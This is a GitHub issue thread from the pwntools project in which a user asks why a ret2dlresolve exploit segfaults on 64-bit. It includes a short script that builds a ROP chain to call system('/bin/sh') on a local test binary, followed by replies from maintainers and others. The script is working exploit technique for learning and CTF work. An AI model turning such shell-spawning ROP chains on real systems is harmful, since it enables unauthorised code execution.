pwntools icon indicating copy to clipboard operation
pwntools copied to clipboard
verified publisher icon Gallopsled

ret2dlresolve segfaulting.

Open rectanglestuff opened this issue 1 year ago • 2 comments

get segfault for 64 bit, the 64+context.bytes are 72, and this seems to be the correct offset for the 64bit example.

on 32 bit p.send(fit({76: rop.chain(), 200: dlresolve.payload})) getting still a shell

from pwn import *

context.binary = elf = ELF('./main')
rop = ROP(elf)
dlresolve = Ret2dlresolvePayload(elf, symbol="system", args=["/bin/sh"])

rop.read(0, dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)

raw_rop = rop.chain()
print(rop.dump())
print(64+context.bytes)

p = elf.process()
p.sendline(fit({64+context.bytes:rop.chain(), 200:dlresolve.payload}))
p.interactive()

rectanglestuff avatar Jun 08 '24 08:06 rectanglestuff

Thank you for contributing to pwntools. In order for us to be able to help you, we need more information.

  1. What have you done?
  2. What did you expect?
  3. What happened instead?
  4. What version of pwntools are you using (pwn version), what scripts and binaries have you used, can we reproduce it too?

Arusekk avatar Jun 15 '24 14:06 Arusekk

Try adding context.arch = 'amd64' at line 3? Pwntools have 32bit and 64bit payloads and 32bit is the default option.

RocketMaDev avatar Jun 27 '24 17:06 RocketMaDev

Were you able to resolve this?

trishaa4144 avatar Dec 06 '24 17:12 trishaa4144

Need more information. Feel free to reopen once you can tell us more.

Arusekk avatar Mar 01 '25 01:03 Arusekk